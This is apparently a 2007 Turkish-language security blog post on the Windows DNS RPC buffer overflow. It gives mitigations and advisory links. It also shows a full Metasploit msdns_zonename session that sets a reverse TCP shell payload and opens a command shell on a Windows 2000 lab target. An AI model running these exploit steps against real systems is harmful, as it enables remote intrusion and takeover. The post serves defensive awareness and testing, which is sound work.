Microsoft Windows DNS RPC buffer overflow acigi

Posted on April 16, 2007 by Huzeyfe ONAL

Windows adminleri hafta sonunu yine rahat geciremediler.. Saglam guvenlik admini olanlar haric:D

Acik Windows DNS servisinin uzaktan yonetimini saglayan RPC(Remote Procedure Call) de cikan buffer overflow’dan kaynaklaniyor. Acigi degerlendiren biri sistemde istedigi gibi at oynatabilir. Daha acigi tam anlamadan, analiz etmeden exploitleri de yayinlanmaya baslayinca daha bir telas sardi.

Aciktan korunmak icin simdilik DNS servisinin uzaktan yonetilmesini saglayan RPC servisini devre disi birakmak yeterli. Ya da gerekli ise bu servisi sadece belirli IP/network adreslerine acmak …

Saglam bir guvenlik duvari politikasi olanlar zaten disardan gelen saldirilardan etkilenmeyecektir. (DNS icin calisan RPC servisi 1024-5000 portlari arasinda calisiyor(mus))Yonetim amacli verilen hizmetlerin herkese acik olmasi basli basina bir acik oldugundan bu aciktan etkilenenlerin acigi gidermeden once yapmalari gereken daha onemli isleri var diye dusunuyorum.

Acigi test etmek icin Metasploit guncellemelerini gectikten sonra..


msf> use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) >
msf exploit(msdns_zonename) > set PAYLOAD
msf exploit(msdns_zonename) > set msf exploit(msdns_zonename) > set RHOST
msf exploit(msdns_zonename) > exploit

-- example --

< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ msf v3.0
+ -- --=[ 184 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 33 aux

msf > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(msdns_zonename) > set LHOST 192.168.0.127
LHOST => 192.168.0.127
msf exploit(msdns_zonename) > set LPORT 4444
LPORT => 4444
msf exploit(msdns_zonename) > set RHOST 172.16.233.128
RHOST => 172.16.233.128

msf exploit(msdns_zonename) > exploit
[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1356
[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
[*] Binding to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_ip_tcp:172.16.233.128
[0] ...
[*] Bound to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_ip_tcp:172.16.233.128
[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.0.127:4444 ->
192.168.0.127:45196)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

c:\>
(MTS mail listesi)

Acik ile ilgili detay bilgi
http://www.kb.cert.org/vuls/id/555920
http://www.microsoft.com/technet/security/advisory/935964.mspx

adreslerinden edinilebilir.

Related posts:

  1. WordPress 2.6.1 de ciddi guvenlik acigi(!)
  2. {Etkinlik}MCP turk uyeleri Microsoft Turkiye’de bulusuyor
  3. NetSec Topluluğu Microsoft Bilişim Zirvesi’nde
  4. Windows sistemlerde sertifika guven(siz)ligi
  5. Windows icin ucretsiz IPsec istemcisi

This entry was posted in Windows Security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

eleven + 10 =